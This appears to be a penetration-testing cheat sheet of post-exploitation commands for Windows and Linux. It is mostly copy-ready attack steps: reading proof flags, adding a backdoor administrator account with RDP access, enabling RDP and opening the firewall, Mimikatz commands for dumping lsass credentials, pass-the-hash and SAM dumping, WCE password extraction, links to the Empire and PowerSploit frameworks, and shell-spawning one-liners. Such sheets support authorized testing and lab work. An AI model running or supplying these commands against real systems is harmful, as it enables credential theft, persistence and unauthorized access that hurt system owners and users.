Post exploitation
Don't.stop.here.you.are.only.halfway.

Proof.txt

Linux
1
cat /root/proof.txt
Copied!
Windows
1
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!

Windows

Add RDP user

1
net user hodor Qwerty123! /add
2
net localgroup administrators hodor /add
3
net localgroup "Remote Desktop Users" hodor /add
Copied!

Enable RDP

Via registry:
1
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Copied!
Add firewall rule:
1
netsh firewall set service remoteadmin enable
2
netsh firewall set service remotedesktop enable
Copied!

Rdesktop resolution

1
rdesktop -g 1024x768 x.x.x.x
Copied!

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::logonpasswords
Copied!
Pass-the-hash
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Copied!
Elevate token
1
privilege::debug
2
log sekurlsa.log
3
token::elevate
Copied!
Dump SAM
1
privilege::debug
2
log sekurlsa.log
3
lsadump::sam
Copied!

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
www.ampliasecurity.com
1
C:\> wce -w
Copied!

Networking

Is there a connection with another host?
1
netstat -ano
Copied!
Hosts file
1
C:\WINDOWS\System32\drivers\etc\hosts
Copied!
Firewall config
1
netsh firewall show state
2
netsh firewall show config
3
netsh dump
Copied!

PowerShell tools

Empire

GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.
GitHub

PowerSploit

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework
GitHub

Linux

Spawn TTY shell

1
python -c 'import pty; pty.spawn("/bin/sh")'
Copied!
1
echo os.system('/bin/bash')
Copied!
1
/bin/bash -i
2
/bin/sh -i
Copied!
1
perl —e 'exec "/bin/sh";'
Copied!
Last modified 1yr ago